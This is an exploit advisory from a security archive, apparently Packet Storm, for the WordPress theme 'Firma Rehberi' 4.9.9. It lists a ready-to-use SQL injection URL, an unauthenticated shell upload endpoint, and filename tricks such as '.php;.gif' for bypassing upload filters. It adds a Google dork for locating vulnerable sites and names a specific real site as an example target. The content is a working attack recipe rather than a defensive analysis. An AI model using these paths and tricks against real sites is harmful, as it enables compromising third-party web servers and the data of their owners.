exploit the possibilities

WordPress Firma Rehberi 4.9.9 Shell Upload / SQL Injection

WordPress Firma Rehberi 4.9.9 Shell Upload / SQL Injection
Posted Dec 22, 2018
Authored by KingSkrupellos

WordPress Firma Rehberi theme version 4.9.9 suffers from remote shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
MD5 | e71809bce3fc6606f39e6e94200149a8

WordPress Firma Rehberi 4.9.9 Shell Upload / SQL Injection

Change Mirror Download
#################################################################################################

# Exploit Title : WordPress Firma Rehberi Themes 4.9.9 SQL Injection and
Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 22/12/2018
# Vendor Homepage : wordpress.org ~ temafabrika.com/demo/rehber3/
# Software Download Link :
temafabrika.com/wordpress-responsive-firma-rehberi-3-temasi.html
# Software Price : 150 TL
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : V4.9.9 ~ PHP 5.6.30 ~ jQuery 1.12.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/rehber/js/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
CWE-264 - [ Permissions, Privileges, and Access Controls ] - + CWE-434- [
Unrestricted Upload of File with Dangerous Type ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# SQL Injection Exploit :

/wp-content/themes/rehber/index.php?id=1%27

# Arbitrary File Upload/Shell Upload Exploit :

/wp-content/themes/rehber/js/upload.php

# Directory File Path :

/fresim/resim[RANDOMNUMBERS][YOURFILENAMEHERE].php;.gif

# Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg

#################################################################################################

# Example Vulnerable Site =>

[+] bagcilarfirmarehberi.com/wp-content/themes/rehber/js/upload.php

#################################################################################################

# SQL Database Error :

Fatal error: Call to undefined function get_header() in
/home/bagcilarfirma/public_html/wp-content/themes/rehber/index.php on line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close